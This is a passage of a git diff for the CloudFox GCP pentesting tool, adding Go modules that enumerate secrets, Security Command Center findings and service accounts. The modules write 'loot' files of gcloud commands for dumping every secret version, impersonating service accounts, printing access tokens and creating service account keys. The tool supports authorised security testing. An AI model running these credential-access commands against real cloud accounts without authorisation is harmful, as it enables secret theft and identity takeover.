m.LootMap["secrets-commands"] = &internal.LootFile{ + Name: "secrets-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { + // Extract secret name from full path + secretName := getSecretShortName(secret.Name) + + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SECRET: %s (Project: %s)\n"+ + "# ==========================================\n"+ + "# Encryption: %s, Replication: %s, Rotation: %s\n"+ + "# Created: %s\n", + secretName, secret.ProjectID, + secret.EncryptionType, secret.ReplicationType, secret.Rotation, + secret.CreationTime, + ) + + // KMS key info + if secret.KMSKeyName != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) + } + + // Rotation info + if secret.Rotation == "enabled" { + if secret.RotationPeriod != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - cloudfoxOutput := GCPSecretsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_SECRETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + if secret.NextRotationTime != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_SECRETS_MODULE_NAME) + } + + // IAM bindings + if len(secret.IAMBindings) > 0 { + m.LootMap["secrets-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range secret.IAMBindings { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "# %s: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) + } + } + + // Commands + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "\n# Describe secret:\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "# List versions:\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n"+ + "# Access latest version:\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n"+ + "# Download all versions:\n"+ + "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ + " echo \"=== Version $v ===\"\n"+ + " gcloud secrets versions access $v --secret=%s --project=%s\n"+ + "done\n"+ + "# Add a new version:\n"+ + "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) +} + + +// ------------------------------ +// Helper functions +// ------------------------------ + +// getSecretShortName extracts the short name from a full secret resource path +func getSecretShortName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// getSecretMemberType extracts the member type from a GCP IAM member string +func getSecretMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Combined table with IAM columns (one row per IAM member) + header := []string{ + "Project Name", + "Project ID", + "Name", + "Encryption", + "KMS Key", + "Replication", + "Rotation", + "Rotation Period", + "Next Rotation", + "Expiration", + "Destroy TTL", + "Created", + "IAM Role", + "Member Type", + "IAM Member", + } + + var body [][]string + for _, secret := range m.Secrets { + secretName := getSecretShortName(secret.Name) + + // Format expiration + expiration := "-" + if secret.HasExpiration { + if secret.ExpireTime != "" { + expiration = secret.ExpireTime + } else if secret.TTL != "" { + expiration = "TTL: " + secret.TTL + } + } + + // Format version destroy TTL + destroyTTL := "-" + if secret.VersionDestroyTTL != "" { + destroyTTL = secret.VersionDestroyTTL + } + + // Format KMS key (no truncation) + kmsKey := "-" + if secret.KMSKeyName != "" { + kmsKey = secret.KMSKeyName + } + + // Format rotation period + rotationPeriod := "-" + if secret.RotationPeriod != "" { + rotationPeriod = secret.RotationPeriod + } + + // Format next rotation + nextRotation := "-" + if secret.NextRotationTime != "" { + nextRotation = secret.NextRotationTime + } + + // One row per IAM member + if len(secret.IAMBindings) > 0 { + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + memberType := getSecretMemberType(member) + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secret.ProjectID, + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Secret with no IAM bindings + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secret.ProjectID, + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := SecretsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go new file mode 100644 index 00000000..d6f28e07 --- /dev/null +++ b/gcp/commands/securitycenter.go @@ -0,0 +1,523 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" + +var GCPSecurityCenterCommand = &cobra.Command{ + Use: GCP_SECURITYCENTER_MODULE_NAME, + Aliases: []string{"scc", "security", "defender"}, + Hidden: true, + Short: "Enumerate Security Command Center findings and recommendations", + Long: `Enumerate Security Command Center (SCC) findings, assets, and security recommendations. + +Features: +- Lists all active SCC findings by severity (CRITICAL, HIGH, MEDIUM, LOW) +- Shows vulnerable assets and their security issues +- Identifies security posture gaps +- Provides remediation recommendations +- Generates exploitation commands for penetration testing + +Requires Security Command Center API to be enabled and appropriate IAM permissions: +- roles/securitycenter.findingsViewer or roles/securitycenter.admin`, + Run: runGCPSecurityCenterCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type SCCFinding struct { + Name string + Category string + Severity string + State string + ResourceName string + ResourceType string + ProjectID string + Description string + CreateTime string + SourceDisplayName string + ExternalURI string +} + +type SCCAsset struct { + Name string + ResourceName string + ResourceType string + ProjectID string + FindingCount int + Severity string // Highest severity finding +} + +type SCCSource struct { + Name string + DisplayName string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SecurityCenterModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Findings []SCCFinding + Assets map[string]*SCCAsset // keyed by resource name + Sources []SCCSource + LootMap map[string]*internal.LootFile + mu sync.Mutex + OrgID string + UseOrgLevel bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SecurityCenterOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SecurityCenterOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecurityCenterOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecurityCenterCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_SECURITYCENTER_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &SecurityCenterModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Findings: []SCCFinding{}, + Assets: make(map[string]*SCCAsset), + Sources: []SCCSource{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating Security Command Center findings...", GCP_SECURITYCENTER_MODULE_NAME) + + // Create Security Command Center client + client, err := securitycenter.NewClient(ctx) + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, "Failed to create client") + return + } + defer client.Close() + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, client, logger) + } + + // Check results + if len(m.Findings) == 0 { + logger.InfoM("No Security Command Center findings found", GCP_SECURITYCENTER_MODULE_NAME) + logger.InfoM("This could mean: (1) SCC is not enabled, (2) No findings exist, or (3) Insufficient permissions", GCP_SECURITYCENTER_MODULE_NAME) + return + } + + // Count findings by severity + criticalCount := 0 + highCount := 0 + mediumCount := 0 + lowCount := 0 + for _, f := range m.Findings { + switch f.Severity { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + case "MEDIUM": + mediumCount++ + case "LOW": + lowCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d SCC finding(s): %d CRITICAL, %d HIGH, %d MEDIUM, %d LOW", + len(m.Findings), criticalCount, highCount, mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SecurityCenterModule) processProject(ctx context.Context, projectID string, client *securitycenter.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating SCC findings for project: %s", projectID), GCP_SECURITYCENTER_MODULE_NAME) + } + + // List active findings for this project + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + // Create request to list findings + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, // Only active findings + } + + it := client.ListFindings(ctx, req) + + findingsCount := 0 + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, + fmt.Sprintf("Project %s", projectID)) + break + } + + finding := result.Finding + if finding == nil { + continue + } + + // Parse the finding + sccFinding := m.parseFinding(finding, projectID) + + m.mu.Lock() + m.Findings = append(m.Findings, sccFinding) + + // Track affected assets + if sccFinding.ResourceName != "" { + if asset, exists := m.Assets[sccFinding.ResourceName]; exists { + asset.FindingCount++ + // Update to highest severity + if severityRank(sccFinding.Severity) > severityRank(asset.Severity) { + asset.Severity = sccFinding.Severity + } + } else { + m.Assets[sccFinding.ResourceName] = &SCCAsset{ + Name: sccFinding.ResourceName, + ResourceName: sccFinding.ResourceName, + ResourceType: sccFinding.ResourceType, + ProjectID: projectID, + FindingCount: 1, + Severity: sccFinding.Severity, + } + } + } + + // Add to loot files + m.addFindingToLoot(sccFinding, projectID) + m.mu.Unlock() + + findingsCount++ + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d finding(s) in project %s", findingsCount, projectID), GCP_SECURITYCENTER_MODULE_NAME) + } +} + +// parseFinding converts an SCC finding to our internal structure +func (m *SecurityCenterModule) parseFinding(finding *securitycenterpb.Finding, projectID string) SCCFinding { + sccFinding := SCCFinding{ + Name: finding.Name, + Category: finding.Category, + State: finding.State.String(), + ProjectID: projectID, + ResourceName: finding.ResourceName, + Description: finding.Description, + ExternalURI: finding.ExternalUri, + } + + // Parse severity + if finding.Severity != securitycenterpb.Finding_SEVERITY_UNSPECIFIED { + sccFinding.Severity = finding.Severity.String() + } else { + sccFinding.Severity = "UNSPECIFIED" + } + + // Parse resource type from resource name + if finding.ResourceName != "" { + parts := strings.Split(finding.ResourceName, "/") + if len(parts) >= 2 { + sccFinding.ResourceType = parts[len(parts)-2] + } + } + + // Get create time + if finding.CreateTime != nil { + sccFinding.CreateTime = finding.CreateTime.AsTime().Format("2006-01-02 15:04:05") + } + + // Parse source display name from finding name + if finding.Name != "" { + // Format: organizations/{org}/sources/{source}/findings/{finding} + // or projects/{project}/sources/{source}/findings/{finding} + parts := strings.Split(finding.Name, "/") + for i, part := range parts { + if part == "sources" && i+1 < len(parts) { + sccFinding.SourceDisplayName = parts[i+1] + break + } + } + } + + return sccFinding +} + +// severityRank returns a numeric rank for severity comparison +func severityRank(severity string) int { + switch severity { + case "CRITICAL": + return 4 + case "HIGH": + return 3 + case "MEDIUM": + return 2 + case "LOW": + return 1 + default: + return 0 + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecurityCenterModule) initializeLootFiles() { + m.LootMap["security-center-commands"] = &internal.LootFile{ + Name: "security-center-commands", + Contents: "# Security Command Center Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { + // Only add CRITICAL and HIGH severity findings to loot + if finding.Severity != "CRITICAL" && finding.Severity != "HIGH" { + return + } + + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "## Finding: %s (%s)\n"+ + "# Category: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n", + finding.Name, finding.Severity, + finding.Category, + finding.ResourceName, + projectID, + ) + + if finding.Description != "" { + m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) + } + + if finding.ExternalURI != "" { + m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) + } + + // Add gcloud commands + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "\n# View finding details:\n"+ + "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", + projectID, finding.Name, + ) + + // Add specific commands based on category + categoryLower := strings.ToLower(finding.Category) + switch { + case strings.Contains(categoryLower, "public_bucket"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# Remove public access:\n"+ + "gsutil iam ch -d allUsers:objectViewer %s\n"+ + "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", + finding.ResourceName, + finding.ResourceName, + ) + case strings.Contains(categoryLower, "firewall"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# Review firewall rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + finding.ResourceName, + projectID, + ) + case strings.Contains(categoryLower, "service_account_key"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# List service account keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n\n", + finding.ResourceName, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort findings by severity + sort.Slice(m.Findings, func(i, j int) bool { + return severityRank(m.Findings[i].Severity) > severityRank(m.Findings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Project Name", + "Project ID", + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range m.Findings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + m.GetProjectName(f.ProjectID), + f.ProjectID, + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table + assetsHeader := []string{ + "Project Name", + "Project ID", + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + for _, asset := range m.Assets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + m.GetProjectName(asset.ProjectID), + asset.ProjectID, + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return assetsBody[i][4] > assetsBody[j][4] + }) + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + output := SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go new file mode 100644 index 00000000..4c853211 --- /dev/null +++ b/gcp/commands/serviceaccounts.go @@ -0,0 +1,582 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAccountsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + Aliases: []string{"sa", "sas", "service-accounts"}, + Short: "Enumerate GCP service accounts with security analysis", + Long: `Enumerate GCP service accounts with detailed security analysis. + +Features: +- Lists all service accounts with metadata +- Analyzes user-managed keys (age, expiration) +- Identifies default service accounts (Compute, App Engine, etc.) +- Detects disabled service accounts +- Flags service accounts without key rotation +- Identifies impersonation opportunities`, + Run: runGCPServiceAccountsCommand, +} + +// ServiceAccountAnalysis extends ServiceAccountInfo with security analysis +type ServiceAccountAnalysis struct { + IAMService.ServiceAccountInfo + IsDefaultSA bool + DefaultSAType string // "compute", "appengine", "cloudbuild", etc. + OldestKeyAge int // Days + HasExpiredKeys bool + HasOldKeys bool // Keys older than 90 days + // Pentest: Impersonation analysis + ImpersonationInfo *IAMService.SAImpersonationInfo +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ServiceAccountsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ServiceAccounts []ServiceAccountAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ServiceAccountsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAccountsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAccountsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &ServiceAccountsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ServiceAccounts: []ServiceAccountAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) + + // Check results + if len(m.ServiceAccounts) == 0 { + logger.InfoM("No service accounts found", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + return + } + + // Count findings + withKeys := 0 + defaultSAs := 0 + impersonatable := 0 + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + withKeys++ + } + if sa.IsDefaultSA { + defaultSAs++ + } + if sa.ImpersonationInfo != nil && (len(sa.ImpersonationInfo.TokenCreators) > 0 || len(sa.ImpersonationInfo.KeyCreators) > 0) { + impersonatable++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d default, %d impersonatable)", + len(m.ServiceAccounts), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service accounts in project: %s", projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Create service and fetch service accounts with impersonation analysis + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccountsWithImpersonation(projectID) + if err != nil { + // Fallback to basic enumeration if impersonation analysis fails + serviceAccounts, err = iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + return + } + } + + // Get impersonation info for each SA + impersonationMap := make(map[string]*IAMService.SAImpersonationInfo) + impersonationInfos, err := iamService.GetAllServiceAccountImpersonation(projectID) + if err == nil { + for i := range impersonationInfos { + impersonationMap[impersonationInfos[i].ServiceAccount] = &impersonationInfos[i] + } + } + + // Analyze each service account + var analyzedSAs []ServiceAccountAnalysis + for _, sa := range serviceAccounts { + analyzed := m.analyzeServiceAccount(sa, projectID) + // Attach impersonation info if available + if info, ok := impersonationMap[sa.Email]; ok { + analyzed.ImpersonationInfo = info + } + analyzedSAs = append(analyzedSAs, analyzed) + } + + // Thread-safe append + m.mu.Lock() + m.ServiceAccounts = append(m.ServiceAccounts, analyzedSAs...) + + // Generate loot for each service account + for _, sa := range analyzedSAs { + m.addServiceAccountToLoot(sa, projectID) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service account(s) in project %s", len(analyzedSAs), projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } +} + +// analyzeServiceAccount performs security analysis on a service account +func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccountInfo, projectID string) ServiceAccountAnalysis { + analyzed := ServiceAccountAnalysis{ + ServiceAccountInfo: sa, + } + + // Check if it's a default service account + analyzed.IsDefaultSA, analyzed.DefaultSAType = isDefaultServiceAccount(sa.Email, projectID) + + // Analyze keys + if len(sa.Keys) > 0 { + now := time.Now() + oldestAge := 0 + + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + // Calculate key age + keyAge := int(now.Sub(key.ValidAfter).Hours() / 24) + if keyAge > oldestAge { + oldestAge = keyAge + } + + // Check for expired keys + if !key.ValidBefore.IsZero() && now.After(key.ValidBefore) { + analyzed.HasExpiredKeys = true + } + + // Check for old keys (> 90 days) + if keyAge > 90 { + analyzed.HasOldKeys = true + } + } + } + + analyzed.OldestKeyAge = oldestAge + } + + return analyzed +} + +// isDefaultServiceAccount checks if a service account is a GCP default service account +func isDefaultServiceAccount(email, projectID string) (bool, string) { + // Compute Engine default service account + if strings.HasSuffix(email, "-compute@developer.gserviceaccount.com") { + return true, "Compute Engine" + } + + // App Engine default service account + if strings.HasSuffix(email, "@appspot.gserviceaccount.com") { + return true, "App Engine" + } + + // Cloud Build service account + if strings.Contains(email, "@cloudbuild.gserviceaccount.com") { + return true, "Cloud Build" + } + + // Cloud Functions service account (project-id@appspot.gserviceaccount.com) + if email == fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID) { + return true, "App Engine/Functions" + } + + // Dataflow service account + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // This is also used by Dataflow + return true, "Compute/Dataflow" + } + + // GKE service account + if strings.Contains(email, "@container-engine-robot.iam.gserviceaccount.com") { + return true, "GKE" + } + + // Cloud SQL service account + if strings.Contains(email, "@gcp-sa-cloud-sql.iam.gserviceaccount.com") { + return true, "Cloud SQL" + } + + // Pub/Sub service account + if strings.Contains(email, "@gcp-sa-pubsub.iam.gserviceaccount.com") { + return true, "Pub/Sub" + } + + // Firebase service accounts + if strings.Contains(email, "@firebase.iam.gserviceaccount.com") { + return true, "Firebase" + } + + // Google APIs service account + if strings.Contains(email, "@cloudservices.gserviceaccount.com") { + return true, "Google APIs" + } + + return false, "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAccountsModule) initializeLootFiles() { + m.LootMap["serviceaccounts-commands"] = &internal.LootFile{ + Name: "serviceaccounts-commands", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysis, projectID string) { + keyFileName := strings.Split(sa.Email, "@")[0] + + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SERVICE ACCOUNT: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Disabled: %v\n", + sa.Email, + projectID, + sa.DisplayName, + sa.Disabled, + ) + + // Add impersonation info if available + if sa.ImpersonationInfo != nil { + if len(sa.ImpersonationInfo.TokenCreators) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) + } + if len(sa.ImpersonationInfo.KeyCreators) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) + } + if len(sa.ImpersonationInfo.ActAsUsers) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) + } + } + + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + "\n# Impersonation commands:\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n"+ + "gcloud auth print-identity-token --impersonate-service-account=%s\n\n"+ + "# Key creation commands:\n"+ + "gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s\n"+ + "gcloud auth activate-service-account --key-file=%s-key.json\n\n"+ + "# Describe service account:\n"+ + "gcloud iam service-accounts describe %s --project=%s\n\n"+ + "# Get IAM policy for this service account:\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", + sa.Email, + sa.Email, + keyFileName, + sa.Email, + projectID, + keyFileName, + sa.Email, + projectID, + sa.Email, + projectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Service accounts table - one row per IAM binding (impersonation permission) + saHeader := []string{ + "Project Name", + "Project ID", + "Email", + "Display Name", + "Disabled", + "Default SA", + "DWD", + "Key Count", + "IAM Role", + "IAM Member", + } + + var saBody [][]string + for _, sa := range m.ServiceAccounts { + disabled := "No" + if sa.Disabled { + disabled = "Yes" + } + + defaultSA := "-" + if sa.IsDefaultSA { + defaultSA = sa.DefaultSAType + } + + // Check if DWD is enabled + dwd := "No" + if sa.OAuth2ClientID != "" { + dwd = "Yes" + } + + // Count user-managed keys + keyCount := "-" + 